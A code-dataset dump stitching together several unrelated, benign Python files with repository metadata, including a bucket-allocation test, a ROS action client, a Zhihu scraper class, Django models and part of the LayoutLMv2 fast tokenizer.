results = parser.parse_args()
pathname = os.path.dirname(sys.argv[0])
home_dir = os.path.expanduser('~') + "/.photoworkflow/"
db_filename = home_dir + 'pictures.db'
schema_filename = pathname + '/schema.sql'
if len(sys.argv) == 1:
parser.print_help()
sys.exit(-1)
if not os.path.exists(home_dir):
try:
print("create dir %s" % home_dir)
os.makedirs(home_dir)
except Exception as e:
print(e)
return
db_is_new = os.path.exists(db_filename)
if db_is_new == False:
try:
with sqlite3.connect(db_filename) as conn:
# print ('Creating schema')
with open(schema_filename, 'rt') as f:
schema = f.read()
conn.executescript(schema)
except Exception as e:
print(e)
return
# get all files of type results.type of directory results.dir
files = [f for f in os.listdir(results.dir) if f.endswith("." + results.type) and os.path.isfile(os.path.join(results.dir, f))]
# get number of found files
file_counter = len(files)
print("Step 1: calculate checksum and lookup in database")
# proceed all found files
cnt_file = 1
for file in files:
md5 = getMd5Sum(results.dir + '/' + file)
entry = inDatabase(db_filename, md5)
# 2016.07.16 https://stackoverflow.com/questions/517127/how-do-i-write-output-in-same-place-on-the-console
sys.stdout.write("progress [%d / %d] \r" % (cnt_file, file_counter) )
sys.stdout.flush()
cnt_file = cnt_file + 1
if entry == False:
copyFileInWrkDir(results.dir + '/' + file, home_dir)
if not os.path.isfile(home_dir + '/' + "newfile"):
open(home_dir + '/' + "newfile", 'a').close()
sys.stdout.write("\n")
if __name__ == '__main__':
main()
| 3,478 | 0 | 88 |
df0a868be33c72b8e8b4f9d52ceddcaad2ddc46b | 1,560 | py | Python | jacquard/buckets/tests/test_bucket.py | peteowlett/jacquard | 772fd633e521501688e0933482cba45f48c23ef9 | [
"MIT"
] | null | null | null | jacquard/buckets/tests/test_bucket.py | peteowlett/jacquard | 772fd633e521501688e0933482cba45f48c23ef9 | [
"MIT"
] | null | null | null | jacquard/buckets/tests/test_bucket.py | peteowlett/jacquard | 772fd633e521501688e0933482cba45f48c23ef9 | [
"MIT"
] | null | null | null | import pytest
from jacquard.odm import Session
from jacquard.buckets import Bucket
from jacquard.constraints import Constraints
from jacquard.buckets.utils import release
from jacquard.buckets.constants import NUM_BUCKETS
from jacquard.buckets.exceptions import NotEnoughBucketsException
@pytest.mark.parametrize('divisor', (
2,
3,
4,
5,
6,
10,
100,
))
| 23.636364 | 75 | 0.608974 | import pytest
from jacquard.odm import Session
from jacquard.buckets import Bucket
from jacquard.constraints import Constraints
from jacquard.buckets.utils import release
from jacquard.buckets.constants import NUM_BUCKETS
from jacquard.buckets.exceptions import NotEnoughBucketsException
@pytest.mark.parametrize('divisor', (
2,
3,
4,
5,
6,
10,
100,
))
def test_divisible(divisor):
assert NUM_BUCKETS % divisor == 0
def test_at_least_three_buckets_per_percent():
assert NUM_BUCKETS / 100 >= 3
def test_can_get_empty_bucket_from_old_format():
session = Session({'buckets/1': []})
bucket = session.get(Bucket, 1)
# Force bucket to a string in order to reify the fields. This validates
# that the fields are accessible.
str(bucket)
def test_conflict_on_release():
store = {}
release(
store=store,
name='foo',
constraints=Constraints(),
branches=[
('foo-branch', NUM_BUCKETS // 2, {'setting': 'value'}),
],
)
release(
store=store,
name='bar',
constraints=Constraints(),
branches=[
('bar-branch', NUM_BUCKETS // 2, {'setting': 'value2'}),
],
)
with pytest.raises(NotEnoughBucketsException) as e:
release(
store=store,
name='bazz',
constraints=Constraints(),
branches=[
('bar-branch', NUM_BUCKETS // 2, {'setting': 'value2'}),
],
)
assert e.value.conflicts == {'foo', 'bar'}
| 1,082 | 0 | 91 |
70fd33e04f19b6b60b4eaaa62dc06de3503c2599 | 3,161 | py | Python | kuri_mbzirc_challenge_2_exploration/scripts/test_velodyne_box_detection.py | kuri-kustar/kuri_mbzirc_challenge_2 | 88ac9046ef7e7db20380dff068f6801e06b6cb33 | [
"BSD-3-Clause"
] | 1 | 2019-06-14T08:03:49.000Z | 2019-06-14T08:03:49.000Z | kuri_mbzirc_challenge_2_exploration/scripts/test_velodyne_box_detection.py | kucars/kuri_mbzirc_challenge_2 | 88ac9046ef7e7db20380dff068f6801e06b6cb33 | [
"BSD-3-Clause"
] | null | null | null | kuri_mbzirc_challenge_2_exploration/scripts/test_velodyne_box_detection.py | kucars/kuri_mbzirc_challenge_2 | 88ac9046ef7e7db20380dff068f6801e06b6cb33 | [
"BSD-3-Clause"
] | 3 | 2016-06-11T11:08:31.000Z | 2016-11-16T12:45:22.000Z | #!/usr/bin/env python
""" autonomous.py - Version 1.0 2016-10-12
General framework based on Patrick Goebel's nav_test.py
Initial version based on ccam-navigation by Chris Mobley
Autonomous movement added by Jonathan Hodges
Define waypoint destinations for a robot to move autonomously within
a map framework.
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.5
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details at:
http://www.gnu.org/licenses/gpl.html
"""
import rospy
import rospkg
import actionlib
from actionlib_msgs.msg import *
from geometry_msgs.msg import Pose, PoseWithCovarianceStamped, Point, Quaternion, Twist
from kuri_mbzirc_challenge_2_msgs.msg import BoxPositionAction, BoxPositionGoal
from tf.transformations import quaternion_from_euler
from decimal import *
import time
from math import radians, pi
if __name__ == '__main__':
try:
mbzirc_c2_auto()
rospy.spin()
except rospy.ROSInterruptException:
rospy.loginfo("mbzirc_c2_auto finished.")
| 29.820755 | 87 | 0.725087 | #!/usr/bin/env python
""" autonomous.py - Version 1.0 2016-10-12
General framework based on Patrick Goebel's nav_test.py
Initial version based on ccam-navigation by Chris Mobley
Autonomous movement added by Jonathan Hodges
Define waypoint destinations for a robot to move autonomously within
a map framework.
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.5
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details at:
http://www.gnu.org/licenses/gpl.html
"""
import rospy
import rospkg
import actionlib
from actionlib_msgs.msg import *
from geometry_msgs.msg import Pose, PoseWithCovarianceStamped, Point, Quaternion, Twist
from kuri_mbzirc_challenge_2_msgs.msg import BoxPositionAction, BoxPositionGoal
from tf.transformations import quaternion_from_euler
from decimal import *
import time
from math import radians, pi
class mbzirc_c2_auto():
def __init__(self):
rospy.init_node('test_box_detection', anonymous=True)
# Enable shutdown in rospy (This is important so we cancel any move_base goals
# when the node is killed)
rospy.on_shutdown(self.shutdown)
# Subscribe to the action server
self.client = actionlib.SimpleActionClient("get_box_cluster", BoxPositionAction)
rospy.loginfo("Waiting for action server...")
# Wait 60 seconds for the action server to become available
self.client.wait_for_server(rospy.Duration(60))
rospy.loginfo("Connected to action server")
# Send start command
rospy.loginfo("Sending start command")
goal = BoxPositionGoal()
goal.request = goal.REQUEST_START
goal.range_max = 30
goal.range_max = 60
goal.angle_min = -pi/2
goal.angle_max = pi/2
self.execute(goal)
rospy.loginfo("Started")
#time.sleep(30)
#rospy.loginfo("Sending stop command")
#goal = BoxPositionGoal()
#goal.request = goal.REQUEST_STOP
#self.execute(goal)
#rospy.loginfo("Stopped")
rospy.signal_shutdown("Complete")
def execute(self, goal):
# Send the goal pose to the MoveBaseAction server
self.client.send_goal(goal)
# Allow 1 minute to get there
finished_within_time = self.client.wait_for_result(rospy.Duration(60))
# If we don't get there in time, abort the goal
if not finished_within_time:
self.client.cancel_goal()
rospy.loginfo("Timed out achieving goal")
else:
# We made it!
state = self.client.get_state()
if state == GoalStatus.SUCCEEDED:
rospy.loginfo("Goal succeeded!")
def shutdown(self):
rospy.loginfo("Stopping the robot...")
self.client.cancel_goal()
if __name__ == '__main__':
try:
mbzirc_c2_auto()
rospy.spin()
except rospy.ROSInterruptException:
rospy.loginfo("mbzirc_c2_auto finished.")
| 1,647 | 2 | 98 |
454d529c8030916a7bfae3ca5b35bd22b8161c1c | 2,670 | py | Python | zhihu/zhcls/answer.py | githubao/xiao-awesome-zhihu | 120dd16c731ec610e68dc94eff923e878a71e00e | [
"Apache-2.0"
] | null | null | null | zhihu/zhcls/answer.py | githubao/xiao-awesome-zhihu | 120dd16c731ec610e68dc94eff923e878a71e00e | [
"Apache-2.0"
] | null | null | null | zhihu/zhcls/answer.py | githubao/xiao-awesome-zhihu | 120dd16c731ec610e68dc94eff923e878a71e00e | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
"""
@description: //TODO
@version: 1.0
@author: BaoQiang
@license: Apache Licence
@contact: mailbaoqiang@gmail.com
@site: http://www.github.com/githubao
@software: PyCharm
@file: answer.py
@time: 2016/10/5 22:54
"""
from .base import Base
from .normal import normal_attr
from .other import other_obj
from .streaming import streaming
from .generator import generator_of
from utils import common_save
from .urls import *
| 18.93617 | 82 | 0.618352 | #!/usr/bin/env python
# encoding: utf-8
"""
@description: //TODO
@version: 1.0
@author: BaoQiang
@license: Apache Licence
@contact: mailbaoqiang@gmail.com
@site: http://www.github.com/githubao
@software: PyCharm
@file: answer.py
@time: 2016/10/5 22:54
"""
from .base import Base
from .normal import normal_attr
from .other import other_obj
from .streaming import streaming
from .generator import generator_of
from utils import common_save
from .urls import *
class Answer(Base):
def __init__(self, aid, cache, session):
super(Answer, self).__init__(aid, cache, session)
def _build_url(self):
return ANSWER_DETAIL_URL.format(self.id)
# other_obj
@property
@other_obj('people')
def author(self):
return None
@property
@other_obj()
def question(self):
return None
# normal
@property
@normal_attr()
def comment_count(self):
return None
@property
@normal_attr()
def comment_permission(self):
'''
all/ followee/ nobody
'''
return None
@property
@normal_attr()
def content(self):
return None
@property
@normal_attr()
def created_time(self):
return None
@property
@normal_attr()
def excerpt(self):
return None
@property
@normal_attr()
def is_copyable(self):
return None
@property
@normal_attr()
def is_mine(self):
return None
@property
@normal_attr()
def id(self):
return self._id
@property
@normal_attr()
def thanks_count(self):
return None
@property
@normal_attr()
def updated_time(self):
return None
@property
@normal_attr()
def voteup_count(self):
return None
# streaming
@property
@streaming()
def can_comment(self):
return None
@property
@streaming(use_cache=False)
def suggest_edit(self):
return None
# generators
@property
@generator_of(ANSWER_COLLECTIONS_URL)
def collections(self):
return None
@property
@generator_of(ANSWER_COMMENTS_URL)
def comments(self):
return None
@property
@generator_of(ANSWER_VOTERS_URL, 'people')
def voters(self):
return None
# func
def save(self, path='.', filename=None, invalid_chars=None):
'''
for answer in question.answers:
print(answer.author.name)
answer.save(question.title)
'''
if self._cache is None:
self._get_data()
common_save(path, filename, self.content, self.author.name, invalid_chars)
| 457 | 1,724 | 23 |
6a1bff4e22e7ea16e28b819b64753e7e438ef141 | 698 | py | Python | app/src/main/python/mosca/m_identifica_bordas.py | ricardonascimentosoares/moscadochifreapp | 9dcc4b6e3603003b353477e80dacb87beaf130d5 | [
"MIT"
] | null | null | null | app/src/main/python/mosca/m_identifica_bordas.py | ricardonascimentosoares/moscadochifreapp | 9dcc4b6e3603003b353477e80dacb87beaf130d5 | [
"MIT"
] | null | null | null | app/src/main/python/mosca/m_identifica_bordas.py | ricardonascimentosoares/moscadochifreapp | 9dcc4b6e3603003b353477e80dacb87beaf130d5 | [
"MIT"
] | null | null | null | import cv2
import numpy as np | 24.928571 | 62 | 0.515759 | import cv2
import numpy as np
def identifica_bordas(img_bovino):
# Converte a imagem para tons de cinza
cinza = cv2.cvtColor(img_bovino, cv2.COLOR_BGR2GRAY)
# Suavização
blur = cv2.GaussianBlur(cinza, (41,41) ,0)
# Passa Alta
filtered = cinza - blur
filtered = filtered + 127 * np.ones(cinza.shape, np.uint8)
res = filtered.copy()
res[res < 105] = (0)
res[res >= 105] = (255)
# for i in range(0, res.shape[0]):
# for j in range(0, res.shape[1]):
# (r) = res[i, j]
# if (r < 105):
# res[i, j] = (0)
# else:
# res[i, j] = (255)
return filtered, res | 648 | 0 | 23 |
27a094a65838f27768df614eb5bc4305fbc68db8 | 263 | py | Python | 4-24-18/songbase.py | Ian-Harland/misy350-s18-exercises | de40f7337dea8c9f5db6a182e585ff7549c11842 | [
"MIT"
] | null | null | null | 4-24-18/songbase.py | Ian-Harland/misy350-s18-exercises | de40f7337dea8c9f5db6a182e585ff7549c11842 | [
"MIT"
] | null | null | null | 4-24-18/songbase.py | Ian-Harland/misy350-s18-exercises | de40f7337dea8c9f5db6a182e585ff7549c11842 | [
"MIT"
] | null | null | null | from flask import Flask, redner_template
app = Flask(__name__)
@app.route('/')
@app.route('/users/<string:username>')
if __name__ == '__main__':
app.run()
| 17.533333 | 40 | 0.661597 | from flask import Flask, redner_template
app = Flask(__name__)
@app.route('/')
def index():
return "hello world"
@app.route('/users/<string:username>')
def users(username):
return "<h1>hello %s<h1>" % username
if __name__ == '__main__':
app.run()
| 56 | 0 | 44 |
50abdb5a768ae1f4298b857206805ec3843ad574 | 446 | py | Python | Medium/48. Majority Number III/Solution.py | Zhenye-Na/LxxxCode | afd79d790d0a7495d75e6650f80adaa99bd0ff07 | [
"MIT"
] | 12 | 2019-05-04T04:21:27.000Z | 2022-03-02T07:06:57.000Z | Medium/48. Majority Number III/Solution.py | Zhenye-Na/LxxxCode | afd79d790d0a7495d75e6650f80adaa99bd0ff07 | [
"MIT"
] | 1 | 2019-07-24T18:43:53.000Z | 2019-07-24T18:43:53.000Z | Medium/48. Majority Number III/Solution.py | Zhenye-Na/LxxxCode | afd79d790d0a7495d75e6650f80adaa99bd0ff07 | [
"MIT"
] | 10 | 2019-07-01T04:03:04.000Z | 2022-03-09T03:57:37.000Z | """
48. Majority Number III
"""
# O(n) time
# O(n) extra space
class Solution:
"""
@param nums: A list of integers
@param k: An integer
@return: The majority number
"""
| 18.583333 | 44 | 0.506726 | """
48. Majority Number III
"""
# O(n) time
# O(n) extra space
class Solution:
"""
@param nums: A list of integers
@param k: An integer
@return: The majority number
"""
def majorityNumber(self, nums, k):
# write your code here
limit = len(nums) / k
dict = {}
for num in nums:
dict[num] = dict.get(num, 0) + 1
if dict[num] > limit:
return num
| 225 | 0 | 26 |
5d2fb024a8e83d3340994406c5338ace00a56318 | 1,791 | py | Python | vibes/models.py | macymuhia/IP_vibes | f420caea2955ab574d7d93a2353ccfa5e5ed05d2 | [
"MIT"
] | null | null | null | vibes/models.py | macymuhia/IP_vibes | f420caea2955ab574d7d93a2353ccfa5e5ed05d2 | [
"MIT"
] | 9 | 2020-06-05T22:50:59.000Z | 2022-02-10T13:20:10.000Z | vibes/models.py | macymuhia/IP_vibes | f420caea2955ab574d7d93a2353ccfa5e5ed05d2 | [
"MIT"
] | null | null | null | from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
# Create your models here.
# def create_profile(sender, **kwargs):
# user = kwargs["instance"]
# if kwargs["created"]:
# user_profile = UserProfile(user=user, bio='my bio')
# user_profile.save()
# post_save.connect(create_profile, sender=User)
@receiver(post_save, sender=User)
| 34.442308 | 103 | 0.713009 | from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
# Create your models here.
class UserProfile(models.Model):
user = models.OneToOneField(
User, related_name='profile', on_delete=models.CASCADE)
photo = models.ImageField(upload_to='vibes/',
max_length=255, null=True, blank=True, default='/static/img/default.png')
phone = models.CharField(max_length=20, blank=True, default='')
email_confirmed = models.BooleanField(default=False)
bio = models.TextField()
# def create_profile(sender, **kwargs):
# user = kwargs["instance"]
# if kwargs["created"]:
# user_profile = UserProfile(user=user, bio='my bio')
# user_profile.save()
# post_save.connect(create_profile, sender=User)
@receiver(post_save, sender=User)
def update_user_profile(sender, instance, created, **kwargs):
if created:
UserProfile.objects.create(user=instance)
instance.profile.save()
class Project(models.Model):
title = models.CharField(max_length=30)
image = models.ImageField(upload_to='projects/')
description = models.CharField(max_length=255)
link = models.URLField(default='')
project_owner = models.ForeignKey(User, on_delete=models.DO_NOTHING)
design_rating = models.DecimalField(
max_digits=3, decimal_places=1, default=0, blank=True)
usability_rating = models.DecimalField(
max_digits=3, decimal_places=1, default=0, blank=True)
content_rating = models.DecimalField(
max_digits=3, decimal_places=1, default=0, blank=True)
@classmethod
def fetch_project(cls, project_id):
return cls.objects.filter(project_owner__id=project_id)
| 212 | 1,043 | 68 |
0f711f166abfbfb1b3d26f87bcdde914d199d2d3 | 233 | py | Python | greenferries/utils.py | adipasquale/greenferries-admin | 12344992677b03d8139fe71f8710b5d118d073bf | [
"MIT"
] | 5 | 2020-02-18T00:29:20.000Z | 2020-12-16T12:35:07.000Z | greenferries/utils.py | adipasquale/greenferries-admin | 12344992677b03d8139fe71f8710b5d118d073bf | [
"MIT"
] | 38 | 2020-02-15T11:11:47.000Z | 2020-12-16T12:06:02.000Z | greenferries/utils.py | adipasquale/greenferries-admin | 12344992677b03d8139fe71f8710b5d118d073bf | [
"MIT"
] | null | null | null | import os
| 17.923077 | 60 | 0.609442 | import os
def run_sh(command):
res = os.system(command)
if res != 0:
print(f"Error while running `{command}`, aborting!")
exit(1)
def clean_file(filepath):
run_sh(f"touch {filepath} && rm {filepath}")
| 175 | 0 | 46 |
0a2c84469f7dd1d2124a639fff298d8ba6a8bbd8 | 38,164 | py | Python | src/transformers/models/layoutlmv2/tokenization_layoutlmv2_fast.py | xu-song/transformers | bf3b555d407585144fcdd08a26bc151e8c8f05ff | [
"Apache-2.0"
] | 3 | 2021-11-22T14:00:00.000Z | 2022-02-14T16:12:13.000Z | src/transformers/models/layoutlmv2/tokenization_layoutlmv2_fast.py | xu-song/transformers | bf3b555d407585144fcdd08a26bc151e8c8f05ff | [
"Apache-2.0"
] | 1 | 2021-12-01T21:38:47.000Z | 2021-12-01T21:38:47.000Z | src/transformers/models/layoutlmv2/tokenization_layoutlmv2_fast.py | xu-song/transformers | bf3b555d407585144fcdd08a26bc151e8c8f05ff | [
"Apache-2.0"
] | 2 | 2021-02-18T03:12:51.000Z | 2021-04-16T13:16:58.000Z | # coding=utf-8
# Copyright 2021 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fast tokenization class for LayoutLMv2. It overwrites 2 methods of the slow tokenizer class, namely _batch_encode_plus
and _encode_plus, in which the Rust tokenizer is used.
"""
import json
from typing import Dict, List, Optional, Tuple, Union
from tokenizers import normalizers
from ...file_utils import PaddingStrategy, TensorType, add_end_docstrings
from ...tokenization_utils_base import (
ENCODE_KWARGS_DOCSTRING,
BatchEncoding,
EncodedInput,
PreTokenizedInput,
TextInput,
TextInputPair,
TruncationStrategy,
)
from ...tokenization_utils_fast import PreTrainedTokenizerFast
from ...utils import logging
from .tokenization_layoutlmv2 import LAYOUTLMV2_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING, LayoutLMv2Tokenizer
logger = logging.get_logger(__name__)
VOCAB_FILES_NAMES = {"vocab_file": "vocab.txt", "tokenizer_file": "tokenizer.json"}
PRETRAINED_VOCAB_FILES_MAP = {
"vocab_file": {
"microsoft/layoutlmv2-base-uncased": "https://huggingface.co/microsoft/layoutlmv2-base-uncased/resolve/main/vocab.txt",
},
"tokenizer_file": {
"microsoft/layoutlmv2-base-uncased": "https://huggingface.co/microsoft/layoutlmv2-base-uncased/resolve/main/tokenizer.json",
},
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
"microsoft/layoutlmv2-base-uncased": 512,
}
PRETRAINED_INIT_CONFIGURATION = {
"microsoft/layoutlmv2-base-uncased": {"do_lower_case": True},
}
class LayoutLMv2TokenizerFast(PreTrainedTokenizerFast):
r"""
Construct a "fast" LayoutLMv2 tokenizer (backed by HuggingFace's `tokenizers` library). Based on WordPiece.
This tokenizer inherits from :class:`~transformers.PreTrainedTokenizerFast` which contains most of the main
methods. Users should refer to this superclass for more information regarding those methods.
Args:
vocab_file (:obj:`str`):
File containing the vocabulary.
do_lower_case (:obj:`bool`, `optional`, defaults to :obj:`True`):
Whether or not to lowercase the input when tokenizing.
unk_token (:obj:`str`, `optional`, defaults to :obj:`"[UNK]"`):
The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this
token instead.
sep_token (:obj:`str`, `optional`, defaults to :obj:`"[SEP]"`):
The separator token, which is used when building a sequence from multiple sequences, e.g. two sequences for
sequence classification or for a text and a question for question answering. It is also used as the last
token of a sequence built with special tokens.
pad_token (:obj:`str`, `optional`, defaults to :obj:`"[PAD]"`):
The token used for padding, for example when batching sequences of different lengths.
cls_token (:obj:`str`, `optional`, defaults to :obj:`"[CLS]"`):
The classifier token which is used when doing sequence classification (classification of the whole sequence
instead of per-token classification). It is the first token of the sequence when built with special tokens.
mask_token (:obj:`str`, `optional`, defaults to :obj:`"[MASK]"`):
The token used for masking values. This is the token used when training this model with masked language
modeling. This is the token which the model will try to predict.
cls_token_box (:obj:`List[int]`, `optional`, defaults to :obj:`[0, 0, 0, 0]`):
The bounding box to use for the special [CLS] token.
sep_token_box (:obj:`List[int]`, `optional`, defaults to :obj:`[1000, 1000, 1000, 1000]`):
The bounding box to use for the special [SEP] token.
pad_token_box (:obj:`List[int]`, `optional`, defaults to :obj:`[0, 0, 0, 0]`):
The bounding box to use for the special [PAD] token.
pad_token_label (:obj:`int`, `optional`, defaults to -100):
The label to use for padding tokens. Defaults to -100, which is the :obj:`ignore_index` of PyTorch's
CrossEntropyLoss.
only_label_first_subword (:obj:`bool`, `optional`, defaults to :obj:`True`):
Whether or not to only label the first subword, in case word labels are provided.
tokenize_chinese_chars (:obj:`bool`, `optional`, defaults to :obj:`True`):
Whether or not to tokenize Chinese characters. This should likely be deactivated for Japanese (see `this
issue <https://github.com/huggingface/transformers/issues/328>`__).
strip_accents: (:obj:`bool`, `optional`):
Whether or not to strip all accents. If this option is not specified, then it will be determined by the
value for :obj:`lowercase` (as in the original LayoutLMv2).
"""
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
pretrained_init_configuration = PRETRAINED_INIT_CONFIGURATION
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
slow_tokenizer_class = LayoutLMv2Tokenizer
@add_end_docstrings(ENCODE_KWARGS_DOCSTRING, LAYOUTLMV2_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING)
def __call__(
self,
text: Union[TextInput, PreTokenizedInput, List[TextInput], List[PreTokenizedInput]],
text_pair: Optional[Union[PreTokenizedInput, List[PreTokenizedInput]]] = None,
boxes: Union[List[List[int]], List[List[List[int]]]] = None,
word_labels: Optional[Union[List[int], List[List[int]]]] = None,
add_special_tokens: bool = True,
padding: Union[bool, str, PaddingStrategy] = False,
truncation: Union[bool, str, TruncationStrategy] = False,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[Union[str, TensorType]] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
**kwargs
) -> BatchEncoding:
"""
Main method to tokenize and prepare for the model one or several sequence(s) or one or several pair(s) of
sequences with word-level normalized bounding boxes and optional labels.
Args:
text (:obj:`str`, :obj:`List[str]`, :obj:`List[List[str]]`):
The sequence or batch of sequences to be encoded. Each sequence can be a string, a list of strings
(words of a single example or questions of a batch of examples) or a list of list of strings (batch of
words).
text_pair (:obj:`List[str]`, :obj:`List[List[str]]`):
The sequence or batch of sequences to be encoded. Each sequence should be a list of strings
(pretokenized string).
boxes (:obj:`List[List[int]]`, :obj:`List[List[List[int]]]`):
Word-level bounding boxes. Each bounding box should be normalized to be on a 0-1000 scale.
word_labels (:obj:`List[int]`, :obj:`List[List[int]]`, `optional`):
Word-level integer labels (for token classification tasks such as FUNSD, CORD).
"""
# Input type checking for clearer error
if text_pair is not None:
# in case text + text_pair are provided, text = questions, text_pair = words
if not _is_valid_text_input(text):
raise ValueError("text input must of type `str` (single example) or `List[str]` (batch of examples). ")
if not isinstance(text_pair, (list, tuple)):
raise ValueError(
"Words must be of type `List[str]` (single pretokenized example), "
"or `List[List[str]]` (batch of pretokenized examples)."
)
else:
# in case only text is provided => must be words
if not isinstance(text, (list, tuple)):
raise ValueError(
"Words must be of type `List[str]` (single pretokenized example), "
"or `List[List[str]]` (batch of pretokenized examples)."
)
if text_pair is not None:
is_batched = isinstance(text, (list, tuple))
else:
is_batched = isinstance(text, (list, tuple)) and text and isinstance(text[0], (list, tuple))
words = text if text_pair is None else text_pair
assert boxes is not None, "You must provide corresponding bounding boxes"
if is_batched:
assert len(words) == len(boxes), "You must provide words and boxes for an equal amount of examples"
for words_example, boxes_example in zip(words, boxes):
assert len(words_example) == len(
boxes_example
), "You must provide as many words as there are bounding boxes"
else:
assert len(words) == len(boxes), "You must provide as many words as there are bounding boxes"
if is_batched:
if text_pair is not None and len(text) != len(text_pair):
raise ValueError(
f"batch length of `text`: {len(text)} does not match batch length of `text_pair`: {len(text_pair)}."
)
batch_text_or_text_pairs = list(zip(text, text_pair)) if text_pair is not None else text
is_pair = bool(text_pair is not None)
return self.batch_encode_plus(
batch_text_or_text_pairs=batch_text_or_text_pairs,
is_pair=is_pair,
boxes=boxes,
word_labels=word_labels,
add_special_tokens=add_special_tokens,
padding=padding,
truncation=truncation,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_tensors=return_tensors,
return_token_type_ids=return_token_type_ids,
return_attention_mask=return_attention_mask,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_offsets_mapping=return_offsets_mapping,
return_length=return_length,
verbose=verbose,
**kwargs,
)
else:
return self.encode_plus(
text=text,
text_pair=text_pair,
boxes=boxes,
word_labels=word_labels,
add_special_tokens=add_special_tokens,
padding=padding,
truncation=truncation,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_tensors=return_tensors,
return_token_type_ids=return_token_type_ids,
return_attention_mask=return_attention_mask,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_offsets_mapping=return_offsets_mapping,
return_length=return_length,
verbose=verbose,
**kwargs,
)
@add_end_docstrings(ENCODE_KWARGS_DOCSTRING, LAYOUTLMV2_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING)
def batch_encode_plus(
self,
batch_text_or_text_pairs: Union[
List[TextInput],
List[TextInputPair],
List[PreTokenizedInput],
],
is_pair: bool = None,
boxes: Optional[List[List[List[int]]]] = None,
word_labels: Optional[Union[List[int], List[List[int]]]] = None,
add_special_tokens: bool = True,
padding: Union[bool, str, PaddingStrategy] = False,
truncation: Union[bool, str, TruncationStrategy] = False,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[Union[str, TensorType]] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
**kwargs
) -> BatchEncoding:
""" """
# Backward compatibility for 'truncation_strategy', 'pad_to_max_length'
padding_strategy, truncation_strategy, max_length, kwargs = self._get_padding_truncation_strategies(
padding=padding,
truncation=truncation,
max_length=max_length,
pad_to_multiple_of=pad_to_multiple_of,
verbose=verbose,
**kwargs,
)
return self._batch_encode_plus(
batch_text_or_text_pairs=batch_text_or_text_pairs,
is_pair=is_pair,
boxes=boxes,
word_labels=word_labels,
add_special_tokens=add_special_tokens,
padding_strategy=padding_strategy,
truncation_strategy=truncation_strategy,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_tensors=return_tensors,
return_token_type_ids=return_token_type_ids,
return_attention_mask=return_attention_mask,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_offsets_mapping=return_offsets_mapping,
return_length=return_length,
verbose=verbose,
**kwargs,
)
@add_end_docstrings(ENCODE_KWARGS_DOCSTRING, LAYOUTLMV2_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING)
def encode_plus(
self,
text: Union[TextInput, PreTokenizedInput],
text_pair: Optional[PreTokenizedInput] = None,
boxes: Optional[List[List[int]]] = None,
word_labels: Optional[List[int]] = None,
add_special_tokens: bool = True,
padding: Union[bool, str, PaddingStrategy] = False,
truncation: Union[bool, str, TruncationStrategy] = False,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[Union[str, TensorType]] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
**kwargs
) -> BatchEncoding:
"""
Tokenize and prepare for the model a sequence or a pair of sequences. .. warning:: This method is deprecated,
``__call__`` should be used instead.
Args:
text (:obj:`str`, :obj:`List[str]`, :obj:`List[List[str]]`):
The first sequence to be encoded. This can be a string, a list of strings or a list of list of strings.
text_pair (:obj:`List[str]` or :obj:`List[int]`, `optional`):
Optional second sequence to be encoded. This can be a list of strings (words of a single example) or a
list of list of strings (words of a batch of examples).
"""
# Backward compatibility for 'truncation_strategy', 'pad_to_max_length'
padding_strategy, truncation_strategy, max_length, kwargs = self._get_padding_truncation_strategies(
